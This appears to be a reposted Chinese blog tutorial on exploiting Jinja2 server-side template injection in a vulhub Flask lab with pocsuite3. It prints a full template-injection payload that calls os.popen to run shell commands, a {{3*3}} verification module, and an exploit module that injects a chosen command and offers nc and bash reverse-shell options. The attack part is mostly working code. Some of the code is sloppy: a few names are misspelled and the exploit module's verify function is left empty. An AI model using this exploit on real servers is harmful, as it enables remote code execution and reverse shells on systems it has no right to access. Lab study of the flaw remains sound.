python安全攻防_python安全攻防第三章之Poc
pocsuite安装
安装pocsuite3
pip3 install pocsuite
安装数据包
pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple/
requirement.txt内容
requests == 2.22.0
PySocks == 1.7.1
requests-toolbelt == 0.9.1
urllib3 == 1.25.6
flask简介
Flask是一个使用pyton编写的轻量级Web应用框架,模板引擎则使用Jinja2。Flask属于微框架(micro-framework),这既是优点也是缺点,优点是框架轻量,更新依赖少,更容易专注于安全方面的漏洞,缺点是不得不通过添加插件来增加依赖列表。Flask 依赖中就有造成模板注人漏洞的插件Jinja2的模板引擎,Jinja2 是一个面向Python的模板语言。
环境安装
git clone https://github.com/vulhub/vulhub.git
进入、vulhub/flask/ssit
docker-compose build
docker-compose up -d
2.代码分析
docker ps -a
docker exec -it 1e8500123856 /bin/bash
def index():
name = request.args.get('name', 'guest')
t = Template("Hello " + name)
return t.render()
if __name__ == "__main__":
app.run()
可以看出name未经过滤就传入了服务器
利用代码及方式
payload:
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("id
").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
顺利执行,可以查看文件内容
关于poc的编写
poc验证模块
from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY
class DemoPOC(POCBase):
vulID = '1.1'
version = '1.1'
author = ['1']
vulDate = '1.1'
createDate = '2020/10/10'
updateDate = '1.1'
references = ['flask']
name = 'flask-poc'
appPowerLink = 'flask'
appName = 'flask'
appVersion = 'flask'
vulType = VUL_TYPE.CODE_EXECUTION
desc = '''
flask
'''
#samples = ['96.234.71.117:80']
#category = POC_CATEGORY.EXPLOITS.REMOTE
def _verify(self):
result = {}
path = "?name="
url = self.url + path
payload = "{{3*3}}"
try:
res = requests.get(url=url + payload )
if res.status_code == 200 and "9" in res.text:
result['VerifyInfo'] = {}
result['VerifyInfo'] = url
result['VerifyInfo'] = payload
except Exception as e: #
return
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not culnerable')
return output
register_poc(DemoPOC)
执行结果:
exp执行模块
from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY
class DemoPOC(POCBase):
vulID = '1.1'
version = '1.1'
author = ['1']
vulDate = '1.1'
createDate = '1.1'
updateDate = '1.1'
references = ['1.1']
name = 'flack-exp'
appPowerLink = 'flack'
appName = 'flask'
appVersion = 'flask'
vulType = VUL_TYPE.CODE_EXECUTION
desc = '''
'''
#samples = ['96.234.71.117:80']
#category = POC_CATEGORY.EXPLOITS.REMOTE
def _options(self): # 结束command参数并执行
o = OrderedDict()
payload = {
"nc": REVERSE_PAYLOAD.NC,
"bash": REVERSE_PAYLOAD.BASH,
}
o["command"] = OptDict(selected="bash", default=payload)
return o
def _verify(self):
output = Output(self)
result = {}
def _attack(self):
#url:http://192.168.0.103:8000/?name={{2*2}}
result = {}
path = "?name="
url = self.url + path
cmd = self.get_option("command")
# payload含义:绕过注册的python逃逸的内置函数
payload = 'name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("' + cmd + '").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D'
try:
res = requests.get(url=url + payload)
t = res.text
t = t.replace('\n','').replace('\r','')
print(t)
t = t.replace(" ","")
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Name'] = payload
except Exception as e:
return
return self.parse_attack(result)
def parse_attack(self,result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(DemoPOC)
执行结果:
还可以利用shell交互模式
`
原文链接:https://blog.csdn.net/qq_34640691/article/details/109005216